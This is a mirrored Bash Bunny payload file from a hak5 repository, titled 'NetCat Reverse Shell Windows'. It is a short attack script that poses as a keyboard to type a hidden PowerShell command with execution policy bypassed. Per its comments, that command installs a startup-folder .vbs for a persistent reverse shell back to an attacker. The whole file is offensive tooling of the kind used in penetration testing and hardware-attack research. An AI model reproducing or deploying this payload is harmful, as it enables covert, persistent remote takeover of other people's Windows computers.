mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
18 lines
673 B
Plaintext
18 lines
673 B
Plaintext
# Title: NetCat Reverse Shell Windows
|
|
# Description: Creates a persistent reverse shell on Windows and connects back to attacker through NetCat
|
|
# Author: 0dyss3us (KeenanV)
|
|
# Props:
|
|
# Version: 1.0
|
|
# Category: Remote Access
|
|
# Target: Windows 10
|
|
# Attackmodes: HID, Storage
|
|
|
|
#Sets attack mode and stores current switch position
|
|
LED SETUP
|
|
ATTACKMODE HID STORAGE
|
|
GET SWITCH_POSITION
|
|
|
|
#Runs Powershell script which puts a .vbs file in the startup folder and runs it
|
|
LED ATTACK
|
|
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
|
|
LED FINISH |